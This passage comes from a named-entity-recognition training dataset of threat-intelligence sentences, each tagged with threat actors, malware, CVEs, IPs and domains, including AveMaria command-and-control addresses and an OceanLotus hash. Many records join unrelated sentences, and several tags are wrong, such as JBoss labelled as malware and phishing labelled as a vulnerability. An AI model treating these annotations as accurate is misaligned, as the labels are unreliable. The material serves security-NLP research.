, Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": {"TOOL: CARBANAK malware": [[15, 31]], "THREAT_ACTOR: FIN7": [[35, 39]], "ORGANIZATION: banking transactions": [[179, 199]], "ORGANIZATION: governments": [[389, 400]], "ORGANIZATION: militaries": [[403, 413]], "ORGANIZATION: defense attaches": [[416, 432]], "ORGANIZATION: media entities": [[435, 449]], "ORGANIZATION: dissidents": [[456, 466]], "ORGANIZATION: figures": [[471, 478]], "ORGANIZATION: Russian government": [[502, 520]]}, "info": {"id": "cyberner_stix_train_002220", "source": "cyberner_stix_train"}} {"text": "In total , Scattered Canary received more than 3 , 000 account credentials as a result of their phishing attacks . In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task .", "spans": {"THREAT_ACTOR: Scattered Canary": [[11, 27]], "VULNERABILITY: phishing": [[96, 104]], "FILEPATH: Careto": [[174, 180]]}, "info": {"id": "cyberner_stix_train_002221", "source": "cyberner_stix_train"}} {"text": "During one intrusion , the threat actors extensively used this tool to execute WMI commands on remote hosts in the environment .", "spans": {"TOOL: WMI": [[79, 82]]}, "info": {"id": "cyberner_stix_train_002222", "source": "cyberner_stix_train"}} {"text": "Also , we found the IP address 185.25.50.93 hosting C2 services for a Delphi backdoor that ESET ’s report states is the final stage payload for these attacks .", "spans": {"IP_ADDRESS: 185.25.50.93": [[31, 43]], "TOOL: C2": [[52, 54]], "TOOL: Delphi": [[70, 76]], "ORGANIZATION: ESET": [[91, 95]]}, "info": {"id": "cyberner_stix_train_002223", "source": "cyberner_stix_train"}} {"text": "The first attack vector is to compromise the out of band authentication for online banks that rely on SMS using SMS forwarding . 
XBOW 's capabilities are derived from BIFROSE and KIVARS ; Shrouded Crossbow gets its name from its unique mutex format . txt . These restrictions are specified by a list of allowed URIs .", "spans": {"TOOL: XBOW": [[129, 133]], "TOOL: BIFROSE": [[167, 174]], "TOOL: KIVARS": [[179, 185]], "FILEPATH: txt": [[251, 254]], "SYSTEM: allowed URIs": [[303, 315]]}, "info": {"id": "cyberner_stix_train_002224", "source": "cyberner_stix_train"}} {"text": "Files of the FLV file format contain a sequence of Tag structures .", "spans": {"TOOL: FLV": [[13, 16]]}, "info": {"id": "cyberner_stix_train_002225", "source": "cyberner_stix_train"}} {"text": "Both WERDLOD and OSX_DOK.C targeted financial institutions , with a particular focus on banks in Switzerland .", "spans": {"MALWARE: WERDLOD": [[5, 12]], "MALWARE: OSX_DOK.C": [[17, 26]]}, "info": {"id": "cyberner_stix_train_002226", "source": "cyberner_stix_train"}} {"text": "Callisto Group appears to be intelligence gathering related to European foreign and security policy . In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": {"THREAT_ACTOR: TG-3390": [[118, 125]], "VULNERABILITY: CVE-2011-3544": [[140, 153]], "MALWARE: HTTPBrowser backdoor": [[221, 241]], "VULNERABILITY: CVE-2010-0738": [[248, 261]], "MALWARE: JBoss": [[283, 288]], "VULNERABILITY: exploit": [[389, 396]]}, "info": {"id": "cyberner_stix_train_002227", "source": "cyberner_stix_train"}} {"text": "In earlier versions , the something part of the relative path was a partially intelligible , yet random mix of words and short combinations of letters and numbers separated by an underscore , for example , “ bee_bomb ” or “ my_te2_mms ” . 
Like many threat groups , TG-3390 conducts strategic web compromises ( SWCs ) , also known as watering hole attacks , on websites associated with the target organization 's vertical or demographic to increase the likelihood of finding victims with relevant information . This time , the group explored unpatched systems vulnerable to CVE-2016-8655 and Dirty COW exploit ( CVE-2016-5195 ) as attack vectors . According to the Education Data Initiative , \" Public education spending in the United States falls short of global benchmarks and lags behind economic growth . \"", "spans": {"THREAT_ACTOR: TG-3390": [[265, 272]], "TOOL: SWCs": [[310, 314]], "VULNERABILITY: CVE-2016-8655": [[573, 586]], "VULNERABILITY: Dirty COW": [[591, 600]], "VULNERABILITY: CVE-2016-5195": [[611, 624]], "ORGANIZATION: Education Data Initiative": [[664, 689]]}, "info": {"id": "cyberner_stix_train_002228", "source": "cyberner_stix_train"}} {"text": "Specifically , Lookout determined these were trojanized versions of the apps SR Chat and YeeCall Pro . First , Turla steals emails by forwarding all outgoing emails to the attackers . ZxShell implemented its own version of the Windows B-TOOL S-OS SC command . The second step is simply the same exploit used in the second step of ProxyNotShell , allowing code execution through PowerShell remoting .", "spans": {"ORGANIZATION: Lookout": [[15, 22]], "SYSTEM: SR Chat": [[77, 84]], "SYSTEM: YeeCall Pro": [[89, 100]], "THREAT_ACTOR: Turla": [[111, 116]], "MALWARE: ZxShell": [[184, 191]], "VULNERABILITY: ProxyNotShell": [[330, 343]], "VULNERABILITY: allowing code execution through PowerShell remoting": [[346, 397]]}, "info": {"id": "cyberner_stix_train_002229", "source": "cyberner_stix_train"}} {"text": "However , around a month ago , Rocke started targeting systems that run Jenkins by attempting to exploit CVE-2018-1000861 and CVE-2019-1003000 . 
A ransomware variant dubbed PyLocky was observed in September 2018 being distributed by a phishing campaign using an invoicing theme .", "spans": {"THREAT_ACTOR: Rocke": [[31, 36]], "VULNERABILITY: CVE-2018-1000861": [[105, 121]], "VULNERABILITY: CVE-2019-1003000": [[126, 142]], "MALWARE: PyLocky": [[173, 180]]}, "info": {"id": "cyberner_stix_train_002230", "source": "cyberner_stix_train"}} {"text": "The updated DealersChoice documents used a similar process to obtain a malicious Flash object from a C2 server , but the inner mechanics of the Flash object contained significant differences in comparison to the original samples we analyzed .", "spans": {"TOOL: DealersChoice": [[12, 25]], "TOOL: Flash": [[81, 86], [144, 149]], "TOOL: C2": [[101, 103]]}, "info": {"id": "cyberner_stix_train_002231", "source": "cyberner_stix_train"}} {"text": "MITRE TAGS Action Tag ID App auto-start at device boot T1402 Input prompt T1411 Capture SMS messages T1412 Application discovery T1418 Capture audio T1429 Location tracking T1430 Access contact list T1432 Access call log T1433 Commonly used port T1436 Standard application layer protocol T1437 Masquerage as legitimate application T1444 Suppress application icon T1508 Capture camera T1512 Screen capture T1513 Foreground persistence T1541 DualToy : New Windows Trojan Sideloads Risky Apps to Android and iOS Devices We started connecting the dots when we discovered that the Okrum backdoor was used to drop a Ketrican backdoor , freshly compiled in 2017 . 
The group focuses on targeting Korean think tank as well as DPRK/nuclear-related targets .", "spans": {"ORGANIZATION: MITRE": [[0, 5]], "MALWARE: DualToy": [[440, 447]], "SYSTEM: Windows": [[454, 461]], "SYSTEM: Android": [[493, 500]], "SYSTEM: iOS": [[505, 508]], "MALWARE: Okrum backdoor": [[576, 590]], "MALWARE: Ketrican backdoor": [[610, 627]], "ORGANIZATION: Korean think tank": [[688, 705]], "ORGANIZATION: DPRK/nuclear-related": [[717, 737]]}, "info": {"id": "cyberner_stix_train_002232", "source": "cyberner_stix_train"}} {"text": "Svpeng is only currently attacking clients of Russian banks . Turla is a notorious group that has been targeting diplomats . Winnti : hpqhvsei.dll . The messages show that Harrison was hired in March 2010 to help promote Ashley Madison online , but the messages also reveal Harrison was heavily involved in helping to create and cultivate phony female accounts on the service .", "spans": {"MALWARE: Svpeng": [[0, 6]], "THREAT_ACTOR: Turla": [[62, 67]], "ORGANIZATION: diplomats": [[113, 122]], "THREAT_ACTOR: Winnti": [[125, 131]], "FILEPATH: hpqhvsei.dll": [[134, 146]], "ORGANIZATION: Harrison": [[172, 180], [274, 282]], "ORGANIZATION: Ashley Madison": [[221, 235]]}, "info": {"id": "cyberner_stix_train_002233", "source": "cyberner_stix_train"}} {"text": "Although there are obvious differences between the legitimate file and the malicious one , filtering out the malicious file would involve going through a data set with noise from millions of possible file names , software publishers , and certificates .", "spans": {}, "info": {"id": "cyberner_stix_train_002234", "source": "cyberner_stix_train"}} {"text": "Since the 2016 publication , Microsoft has come across an evolution of PLATINUM 's file-transfer tool , one that uses the Intel® Active Management Technology ( AMT ) Serial-over-LAN ( SOL ) channel for communication . 
The attack wave started in late July 2011 and continued into midSeptember 2011 .", "spans": {"ORGANIZATION: Microsoft": [[29, 38]], "THREAT_ACTOR: PLATINUM": [[71, 79]], "TOOL: Intel® Active Management Technology": [[122, 157]], "TOOL: AMT": [[160, 163]], "TOOL: Serial-over-LAN": [[166, 181]], "TOOL: SOL": [[184, 187]]}, "info": {"id": "cyberner_stix_train_002235", "source": "cyberner_stix_train"}} {"text": "] cc/3 * * * * * 1 ” . \bThe FBI issued a rare bulletin admitting that a group named APT6 hacked into US government computer systems as far back as 2011 and for years stole sensitive data . Once executed , two files were dropped on the targeted system : a decoy document (a picture) and a fake svchost.exe binary .", "spans": {"ORGANIZATION: FBI": [[28, 31]], "THREAT_ACTOR: group": [[72, 77]], "THREAT_ACTOR: APT6": [[84, 88]], "ORGANIZATION: US government": [[101, 114]], "FILEPATH: svchost.exe": [[293, 304]]}, "info": {"id": "cyberner_stix_train_002236", "source": "cyberner_stix_train"}} {"text": "The email was made to look like as if an investigation report related to Uri terror attack was shared by the MHA official .", "spans": {"TOOL: email": [[4, 9]], "ORGANIZATION: MHA": [[109, 112]]}, "info": {"id": "cyberner_stix_train_002237", "source": "cyberner_stix_train"}} {"text": "In the actual targeted attack detected by the Hungarian National Security Agency , they used components of the TeamViewer tool combined with other malware modules . 
According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability .", "spans": {"TOOL: TeamViewer tool": [[111, 126]], "TOOL: malware modules": [[147, 162]], "ORGANIZATION: security firm": [[182, 195]], "ORGANIZATION: military officials": [[228, 246]], "TOOL: emails": [[266, 272]], "TOOL: Adobe Reader": [[318, 330]], "VULNERABILITY: vulnerability": [[331, 344]]}, "info": {"id": "cyberner_stix_train_002238", "source": "cyberner_stix_train"}} {"text": "FireEye Labs detects this phishing attack and customers will be protected against the usage of these sites in possible future campaigns . The following examples were developed using a Winnti installer that was used in attacks in December 2016 .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "MALWARE: Winnti installer": [[184, 200]]}, "info": {"id": "cyberner_stix_train_002239", "source": "cyberner_stix_train"}} {"text": "The service continues by loading an ELF , created by Baidu , which is capable of tracking the device location before setting up a monitor to harvest phone numbers associated with outgoing calls for those numbers with a country code “ +86 ” prefix , which relates to the People ’ s Republic of China . Both APT41 and the actors in the CCleaner incident used TeamViewer during initial compromise . 
APT28 is using novel techniques involving the EternalBlue exploits and the open source tool Responder to spread laterally through networks and likely target travelers .", "spans": {"ORGANIZATION: Baidu": [[53, 58]], "THREAT_ACTOR: APT41": [[306, 311]], "TOOL: TeamViewer": [[357, 367]], "THREAT_ACTOR: APT28": [[396, 401]], "VULNERABILITY: EternalBlue": [[442, 453]], "VULNERABILITY: exploits": [[454, 462]], "MALWARE: open source tool": [[471, 487]], "MALWARE: Responder": [[488, 497]]}, "info": {"id": "cyberner_stix_train_002240", "source": "cyberner_stix_train"}} {"text": "There is no doubt that BitPaymer ransomware operations are proving successful for Indrik Spider , with an average estimate take of over $200,000 USD per victim , but it is also important to remember that INDRIK SPIDER continues to operate the Dridex banking trojan . We assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage , which we reported on in November 2018 .", "spans": {"TOOL: BitPaymer": [[23, 32]], "TOOL: ransomware": [[33, 43]], "THREAT_ACTOR: INDRIK SPIDER": [[204, 217]], "TOOL: Dridex banking trojan": [[243, 264]]}, "info": {"id": "cyberner_stix_train_002241", "source": "cyberner_stix_train"}} {"text": "Most of the strings inside the module are encrypted with a homebrew XOR-based algorithm .", "spans": {}, "info": {"id": "cyberner_stix_train_002242", "source": "cyberner_stix_train"}} {"text": "Some IoT devices may even communicate basic telemetry back to the device manufacturer or have means to receive software updates .", "spans": {"TOOL: IoT": [[5, 8]]}, "info": {"id": "cyberner_stix_train_002243", "source": "cyberner_stix_train"}} {"text": "MUMMY SPIDER is a criminal entity linked to the core development of the malware most commonly known as Emotet or Geodo . 
Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 .", "spans": {"THREAT_ACTOR: MUMMY SPIDER": [[0, 12]], "TOOL: Emotet": [[103, 109]], "TOOL: Geodo": [[113, 118]], "THREAT_ACTOR: Patchwork": [[131, 140]], "FILEPATH: MS PowerPoint document": [[149, 171]], "VULNERABILITY: CVE-2014-6352": [[197, 210]]}, "info": {"id": "cyberner_stix_train_002244", "source": "cyberner_stix_train"}} {"text": "Fake SMS message luring users to enter a fake website , which contains the malicious APK ( JPCERT report ) . Other commodity RAT malware families , such as AdwindRAT and RevengeRAT , were also linked to suspected APT33 domain activity . A second group , which we call GCMAN because the malware is based on code compiled on the GCC compiler , emerged recently using similar techniques to the Metel Group to infect banking institutions and attempt to transfer money to e-currency services .", "spans": {"ORGANIZATION: JPCERT": [[91, 97]], "TOOL: AdwindRAT": [[156, 165]], "TOOL: RevengeRAT": [[170, 180]], "THREAT_ACTOR: APT33": [[213, 218]], "THREAT_ACTOR: GCMAN": [[268, 273]], "THREAT_ACTOR: Metel Group": [[391, 402]], "ORGANIZATION: banking institutions": [[413, 433]]}, "info": {"id": "cyberner_stix_train_002245", "source": "cyberner_stix_train"}} {"text": "Also , the software vulnerabilities pointed out in the FOTA software by Strazzere in 2015 could have been taken advantage of by cybercriminals looking to steal bank account details or execute other frauds . INF files have been used in the past by MuddyWater , although they were launched using Advpack.dll and not IEAdvpack.dll . 
The actors have also conducted spearphishing .", "spans": {"VULNERABILITY: software vulnerabilities": [[11, 35]], "SYSTEM: FOTA": [[55, 59]], "TOOL: INF files": [[207, 215]], "THREAT_ACTOR: MuddyWater": [[246, 256]], "TOOL: Advpack.dll": [[293, 304]], "TOOL: IEAdvpack.dll": [[313, 326]]}, "info": {"id": "cyberner_stix_train_002246", "source": "cyberner_stix_train"}} {"text": "Two suspicious artifacts have been retrieved from two separate servers within the Die Linke infrastructure .", "spans": {}, "info": {"id": "cyberner_stix_train_002247", "source": "cyberner_stix_train"}} {"text": "Zen does n't even check for the root privilege : it just assumes it has it . The purpose of the attacks appears to be industrial espionage , collecting intellectual property for competitive advantage . Based on our visibility and available data , we only attribute one campaign to the Chinese APT group APT16 . The duration of manipulation may be temporary or longer sustained , depending on operator detection .", "spans": {"MALWARE: Zen": [[0, 3]], "THREAT_ACTOR: APT16": [[303, 308]]}, "info": {"id": "cyberner_stix_train_002248", "source": "cyberner_stix_train"}} {"text": "Following the trail further , we traced malicious traffic back to where it originated from and looked for additional evidence to indicate that the attacker persistently used the same infrastructure .", "spans": {}, "info": {"id": "cyberner_stix_train_002249", "source": "cyberner_stix_train"}} {"text": "This malware family can be used to compromise multiple vendor platforms and leverages uncommon technology to access physical devices . 
Bahamut was first noticed when it targeted a Middle Eastern human rights activist in the first week of January 2017 .", "spans": {"MALWARE: malware": [[5, 12]], "ORGANIZATION: Middle Eastern human rights activist": [[180, 216]]}, "info": {"id": "cyberner_stix_train_002250", "source": "cyberner_stix_train"}} {"text": "All of the 4 previously mentioned toolsets were written in a minimalistic style commonly seen with malware ; MiniDuke even goes as far as having many components written in Assembly language .", "spans": {"MALWARE: MiniDuke": [[109, 117]]}, "info": {"id": "cyberner_stix_train_002251", "source": "cyberner_stix_train"}} {"text": "A complete list of sample hashes is available here . Silence.MainModule is a typical remote control Trojan that provides access to the command shell CMD.EXE with the possibility of downloading files from remote nodes to a computer and uploading files from a computer to a remote server . As part of our monitoring of Iranian threat agents activities , we have detected that since October 2016 and until the end of January 2017 , the Jerusalem Post , as well as multiple other Israeli websites and one website in the Palestinian Authority were compromised by Iranian threat agent CopyKittens .", "spans": {"MALWARE: Silence.MainModule": [[53, 71]], "MALWARE: CMD.EXE": [[149, 156]], "ORGANIZATION: Jerusalem Post": [[433, 447]], "ORGANIZATION: Palestinian Authority": [[516, 537]], "THREAT_ACTOR: CopyKittens": [[579, 590]]}, "info": {"id": "cyberner_stix_train_002252", "source": "cyberner_stix_train"}} {"text": "Interestingly , the command and control server includes a publicly accessible interface to work with the victims : Some of the commands with rough translations : The command-and-control server is running Windows Server 2003 and has been configured for Chinese language : This , together with the logs , is a strong indicator that the attackers are Chinese-speaking . 
Moreover , they used the same exploit kit Niteris as that in the Corkow case . The Operation Aurora , named by McAfee and announced in January 2010 , and the WikiLeaks document disclosures of 2010 have highlighted the fact that external and internal threats are nearly impossible to prevent .", "spans": {"SYSTEM: Windows Server": [[204, 218]], "VULNERABILITY: kit Niteris": [[405, 416]], "TOOL: Corkow": [[432, 438]], "ORGANIZATION: McAfee": [[478, 484]], "ORGANIZATION: WikiLeaks": [[525, 534]]}, "info": {"id": "cyberner_stix_train_002254", "source": "cyberner_stix_train"}} {"text": "] comrose-sturat [ . Just like with RedOctober , the top target of Cloud Atlas is Russia , followed closely by Kazakhstan , according to data from the Kaspersky Security Network ( KSN ) . Occasionally , APT1 attackers have installed C2 server components on systems in their hop infrastructure rather than forwarding connections back to C2 servers in Shanghai . All they need to do is deploy and configure the provided phishing kit with an API key .", "spans": {"THREAT_ACTOR: RedOctober": [[36, 46]], "ORGANIZATION: Kaspersky Security Network": [[151, 177]], "ORGANIZATION: KSN": [[180, 183]], "THREAT_ACTOR: APT1": [[203, 207]], "TOOL: C2": [[233, 235], [336, 338]]}, "info": {"id": "cyberner_stix_train_002255", "source": "cyberner_stix_train"}} {"text": "The GoogleUpdate.exe component is responsible for communicating with the remote C&C server . The oldest sample we've seen up to now is from November 2013 .", "spans": {"MALWARE: GoogleUpdate.exe": [[4, 20]]}, "info": {"id": "cyberner_stix_train_002256", "source": "cyberner_stix_train"}} {"text": "Figure 6 . Based on our research , SWEED — which has been operating since at least 2017 — primarily targets their victims with stealers and remote access trojans . 
McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure , entertainment , finance , health care , and telecommunications .", "spans": {"THREAT_ACTOR: SWEED": [[35, 40]], "ORGANIZATION: McAfee Advanced Threat Research": [[164, 195]], "ORGANIZATION: critical infrastructure": [[307, 330]], "ORGANIZATION: entertainment": [[333, 346]], "ORGANIZATION: finance": [[349, 356]], "ORGANIZATION: health care": [[359, 370]], "ORGANIZATION: telecommunications": [[377, 395]]}, "info": {"id": "cyberner_stix_train_002257", "source": "cyberner_stix_train"}} {"text": "But I never received such files from their command and control server . Political entities in Central Asia have been targeted throughout 2018 by different actors , including IndigoZebra , Sofacy ( with Zebrocy malware ) and most recently by DustSquad ( with Octopus malware ) . Though our visibility of APT1 ’s activities is incomplete , we have analyzed the group ’s intrusions against nearly 150 victims over seven years . While inspecting one of the C&C servers of Miniduke , we have found files that were not related to the C&C code , but seemed to be prepared for infecting visitors using web - based vulnerabilities .", "spans": {"ORGANIZATION: Political entities": [[72, 90]], "THREAT_ACTOR: IndigoZebra": [[174, 185]], "THREAT_ACTOR: Sofacy": [[188, 194]], "TOOL: Zebrocy malware": [[202, 217]], "TOOL: Octopus malware": [[258, 273]], "THREAT_ACTOR: APT1": [[303, 307]], "SYSTEM: C&C servers": [[453, 464]], "MALWARE: Miniduke": [[468, 476]]}, "info": {"id": "cyberner_stix_train_002258", "source": "cyberner_stix_train"}} {"text": "ISMDoor is able to exfiltrate data , take screenshots , and execute arbitrary commands on the victim 's machine . 
The vast majority of systems communicating with Bookworm C2 servers are within the Bangkok metropolitan LOC where a majority of the government of Thailand exists .", "spans": {"TOOL: ISMDoor": [[0, 7]], "MALWARE: Bookworm": [[162, 170]], "TOOL: C2": [[171, 173]], "ORGANIZATION: government": [[246, 256]]}, "info": {"id": "cyberner_stix_train_002259", "source": "cyberner_stix_train"}} {"text": "Gaza Cybergang Group 1 , also dubbed MoleRATs : MoleRATs has been active since at least 2012 .", "spans": {"THREAT_ACTOR: Gaza Cybergang": [[0, 14]], "THREAT_ACTOR: MoleRATs": [[37, 45], [48, 56]]}, "info": {"id": "cyberner_stix_train_002260", "source": "cyberner_stix_train"}} {"text": "TG-3390 : backup.darkhero.org .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "DOMAIN: backup.darkhero.org": [[10, 29]]}, "info": {"id": "cyberner_stix_train_002261", "source": "cyberner_stix_train"}} {"text": "In 2015 and 2016 , GOLD LOWELL frequently exploited JBoss enterprise applications using several versions of this open-source JBoss exploitation tool . Since the last report , PassCV has significantly expanded its targets to include victims in the United States , Taiwan , China and Russia .", "spans": {"TOOL: JBoss": [[52, 57], [125, 130]], "THREAT_ACTOR: PassCV": [[175, 181]]}, "info": {"id": "cyberner_stix_train_002262", "source": "cyberner_stix_train"}} {"text": "Password generation for compressed files takes place client-side with each device using a unique key in most scenarios . Citrix told Threatpost that this is indeed the same password-spraying attack it announced itself last week – but it wouldn't confirm the other details in Resecurity 's post , including the attribution . 
APT1 also used more generic names referencing topics like software : Most do n’t even do much besides Since the most common allowed domain is google-analytics.com ( 17 K websites )", "spans": {"ORGANIZATION: Citrix": [[121, 127]], "ORGANIZATION: Resecurity": [[275, 285]], "THREAT_ACTOR: APT1": [[324, 328]]}, "info": {"id": "cyberner_stix_train_002263", "source": "cyberner_stix_train"}} {"text": "HenBox masquerades as apps such as VPN and Android system apps and often installs legitimate versions of these apps along with HenBox to trick users into thinking they downloaded the legitimate app . Cisco telemetry confirmed that the actors behind Sea Turtle maintained access to the ICS-Forth network from an operational command and control (C2) node . The agroup targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy .", "spans": {"MALWARE: HenBox": [[0, 6], [127, 133]], "SYSTEM: Android": [[43, 50]], "ORGANIZATION: Cisco": [[200, 205]], "TOOL: control (C2)": [[335, 347]], "THREAT_ACTOR: agroup": [[359, 365]], "ORGANIZATION: media": [[386, 391]], "THREAT_ACTOR: admin@338": [[410, 419]], "MALWARE: remote access Trojans": [[477, 498]], "MALWARE: Poison Ivy": [[507, 517]], "ORGANIZATION: government": [[528, 538]], "ORGANIZATION: financial firms": [[543, 558]], "ORGANIZATION: global economic": [[575, 590]]}, "info": {"id": "cyberner_stix_train_002264", "source": "cyberner_stix_train"}} {"text": "Through research , 360 Helios Team has found that , since 2007 , the Poison Ivy Group has carried out 11 years of cyber espionage campaigns against Chinese key units and departments , such as national defense , government , science and technology , education and maritime agencies . 
The vulnerability is bypassing most mitigations; however , as noted above , FireEye email and network products detect the malicious documents .", "spans": {"ORGANIZATION: 360 Helios Team": [[19, 34]], "THREAT_ACTOR: Poison Ivy Group": [[69, 85]], "ORGANIZATION: national defense": [[192, 208]], "ORGANIZATION: government": [[211, 221]], "ORGANIZATION: science": [[224, 231]], "ORGANIZATION: technology": [[236, 246]], "ORGANIZATION: education": [[249, 258]], "ORGANIZATION: maritime agencies": [[263, 280]], "ORGANIZATION: FireEye": [[359, 366]], "TOOL: email": [[367, 372]], "FILEPATH: malicious documents": [[405, 424]]}, "info": {"id": "cyberner_stix_train_002265", "source": "cyberner_stix_train"}} {"text": "So if you have Android 4.4.4 or some more recent version of this OS on your device , your chances of getting infected with Triada are significantly lower . Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group . APT34 loosely aligns with public reporting related to the group \" OilRig \" .", "spans": {"SYSTEM: Android 4.4.4": [[15, 28]], "MALWARE: Triada": [[123, 129]], "THREAT_ACTOR: Shadow Brokers": [[210, 224]], "THREAT_ACTOR: Equation": [[286, 294]], "THREAT_ACTOR: APT34": [[303, 308]], "THREAT_ACTOR: OilRig": [[369, 375]]}, "info": {"id": "cyberner_stix_train_002266", "source": "cyberner_stix_train"}} {"text": "The file is named netwf.dat .", "spans": {"FILEPATH: netwf.dat": [[18, 27]]}, "info": {"id": "cyberner_stix_train_002267", "source": "cyberner_stix_train"}} {"text": "LEAD also steals code-signing certificates to sign its malware in subsequent attacks .", "spans": {"THREAT_ACTOR: LEAD": [[0, 4]]}, "info": {"id": "cyberner_stix_train_002268", "source": "cyberner_stix_train"}} {"text": "TYPE_VIEW_FOCUSED Represents the event of setting input focus of a View . 
In many attacks , the group has succeeded in compromising Microsoft Exchange or Lotus Domino email servers in order to intercept company emails and possibly use them to send counterfeit emails . AveMaria : 185.61.138.249 tain.warzonedns.com noreply377.ddns.net 185.162.131.97 91.192.100.62 server.mtcc.me doddyfire.dyndns.org 212.8.240.116 168.167.45.162 toekie.ddns.net warmaha.warzonedns.com . As a result , we decided to call this variant FakeSG .", "spans": {"TOOL: Microsoft Exchange": [[132, 150]], "TOOL: Lotus Domino email servers": [[154, 180]], "MALWARE: AveMaria": [[269, 277]], "IP_ADDRESS: 185.61.138.249": [[280, 294]], "DOMAIN: tain.warzonedns.com": [[295, 314]], "DOMAIN: noreply377.ddns.net": [[315, 334]], "IP_ADDRESS: 185.162.131.97": [[335, 349]], "IP_ADDRESS: 91.192.100.62": [[350, 363]], "DOMAIN: server.mtcc.me": [[364, 378]], "DOMAIN: doddyfire.dyndns.org": [[379, 399]], "IP_ADDRESS: 212.8.240.116": [[400, 413]], "IP_ADDRESS: 168.167.45.162": [[414, 428]], "DOMAIN: toekie.ddns.net": [[429, 444]], "DOMAIN: warmaha.warzonedns.com": [[445, 467]], "MALWARE: FakeSG": [[516, 522]]}, "info": {"id": "cyberner_stix_train_002269", "source": "cyberner_stix_train"}} {"text": "They should still be on the lookout for these kinds of trojans , as the attackers could target corporate accounts that contain large amounts of money . Since late 2016 , PwC UK and BAE Systems have been assisting victims of a new cyber espionage campaign conducted by APT10 . OceanLotus : a2719f203c3e8dcdcc714dd3c1b60a4cbb5f7d7296dbb88b2a756d85bf0e9c1e Loader #1 . 
KillNet Appears to Increase Capabilities", "spans": {"ORGANIZATION: PwC UK": [[170, 176]], "ORGANIZATION: BAE Systems": [[181, 192]], "THREAT_ACTOR: APT10": [[268, 273]], "THREAT_ACTOR: OceanLotus": [[276, 286]], "FILEPATH: a2719f203c3e8dcdcc714dd3c1b60a4cbb5f7d7296dbb88b2a756d85bf0e9c1e": [[289, 353]]}, "info": {"id": "cyberner_stix_train_002270", "source": "cyberner_stix_train"}} {"text": "Technical Analysis The malware consists of 2 applications : The Dropper : Brain Test ( Unpacked – com.mile.brain , Packed – com.zmhitlte.brain ) This is installed from Google Play and downloads an exploit pack from the server to obtain root access on a device . The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . We observed the deployment and testing of multiple versions of Quasar malware , and the introduction of the bespoke malware families ChChes and RedLeaves .", "spans": {"SYSTEM: Google Play": [[168, 179]], "ORGANIZATION: Unit 42": [[291, 298]], "MALWARE: EPS files": [[371, 380]], "VULNERABILITY: CVE-2015-2545": [[395, 408]], "VULNERABILITY: CVE-2017-0261": [[413, 426]], "MALWARE: Quasar": [[508, 514]], "MALWARE: malware": [[515, 522]], "MALWARE: ChChes": [[578, 584]], "MALWARE: RedLeaves": [[589, 598]]}, "info": {"id": "cyberner_stix_train_002271", "source": "cyberner_stix_train"}} {"text": "More likely , this is a case of common attack tools being re-used between different threat actor groups . Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations . 
The Sofacy threat group continues to target government organizations in the EU , US , and former Soviet states to deliver the Zebrocy tool as a payload .", "spans": {"MALWARE: HIGHNOON": [[128, 136]], "THREAT_ACTOR: Winnti": [[175, 181]], "THREAT_ACTOR: Sofacy threat group": [[355, 374]], "ORGANIZATION: government organizations": [[395, 419]], "MALWARE: Zebrocy tool": [[477, 489]]}, "info": {"id": "cyberner_stix_train_002272", "source": "cyberner_stix_train"}} {"text": "During this stage of the activation cycle , the malware increases the beaconing time to avoid detection . This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia . Rmcmd : In April , Talos discovered a new ransomware actor , RA Group , conducting double extortion attacks using their ransomware variant based on leaked Babuk source code .", "spans": {"THREAT_ACTOR: actor": [[111, 116]], "ORGANIZATION: defense entities": [[174, 190]], "ORGANIZATION: Talos": [[242, 247]], "THREAT_ACTOR: RA Group": [[284, 292]], "MALWARE: Babuk source code": [[378, 395]]}, "info": {"id": "cyberner_stix_train_002273", "source": "cyberner_stix_train"}} {"text": "REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japan such as government agencies as well as those in biotechnology , electronics manufacturing , and industrial chemistry . Around the same time , WildFire also captured an e-mail containing a Word document ( \" hello.docx \" ) with an identical hash as the earlier Word document , this time sent to a U.S. 
Government recipient .", "spans": {"THREAT_ACTOR: REDBALDKNIGHT": [[0, 13]], "THREAT_ACTOR: BRONZE BUTLER": [[30, 43]], "THREAT_ACTOR: Tick": [[48, 52]], "THREAT_ACTOR: cyberespionage group": [[60, 80]], "ORGANIZATION: government agencies": [[111, 130]], "ORGANIZATION: biotechnology": [[151, 164]], "ORGANIZATION: electronics manufacturing": [[167, 192]], "ORGANIZATION: industrial chemistry": [[199, 219]], "ORGANIZATION: WildFire": [[245, 253]], "TOOL: e-mail": [[271, 277]], "TOOL: Word": [[291, 295], [362, 366]], "FILEPATH: hello.docx": [[309, 319]], "ORGANIZATION: Government": [[403, 413]]}, "info": {"id": "cyberner_stix_train_002274", "source": "cyberner_stix_train"}} {"text": "In 2011 MSK stopped following Daylight Saving Time ( DST ) and was set to UTC+4 year-round , then reset to UTC +3 yearround in 2014 .", "spans": {}, "info": {"id": "cyberner_stix_train_002275", "source": "cyberner_stix_train"}} {"text": "In mid-August , the OilRig threat group sent what appeared to be a highly targeted phishing email to a high-ranking office in a Middle Eastern nation . 
